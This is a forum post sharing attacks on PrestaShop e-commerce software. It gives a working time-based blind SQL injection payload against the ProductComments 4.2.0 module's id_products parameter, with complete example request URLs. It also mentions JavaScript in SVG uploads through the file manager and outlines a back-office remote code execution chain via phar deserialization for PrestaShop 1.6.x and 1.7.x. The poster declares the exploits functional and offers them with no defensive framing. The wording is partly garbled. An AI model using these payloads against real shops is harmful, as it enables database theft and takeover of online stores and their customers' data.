tamu secreto Posted February 12, 2021 Share Posted February 12, 2021 SQL Injection Parameter: id_product utility charger : 1 AND (SELECT 4333 FROM (SELECT(SLEEP(5)))xoOt) example: http://localhost/shop//index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1 AND (SELECT 4333 FROM (SELECT(SLEEP(5)))xoOt) ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=[SQL] Example: http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(2))) Cross-Site Request Forgery The file manager, which allows the following files to be uploaded. jpg, jpeg, png, gif, bmp, tiff, svg, pdf, mov, mpeg, mp4, avi, mpg, wma, flv, webm The SVG file upload can contain Javascript code. Remote Code Execution Vulnerable Package Link: https://assets.prestashop2.com/en/system/files/ps_releases/prestashop_1.7.4.3.zip Apli: PrestaShop 1.6.x <= 1.6.1.23 & 1.7.x - Back Office Remote Code Execution Chaining multiple vulnerabilities to trigger deserialization via phar back-office-url email password func param. The values were changed, to a good understanding few words. The exploits are functional !!🙄 greetings luck !😇 Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now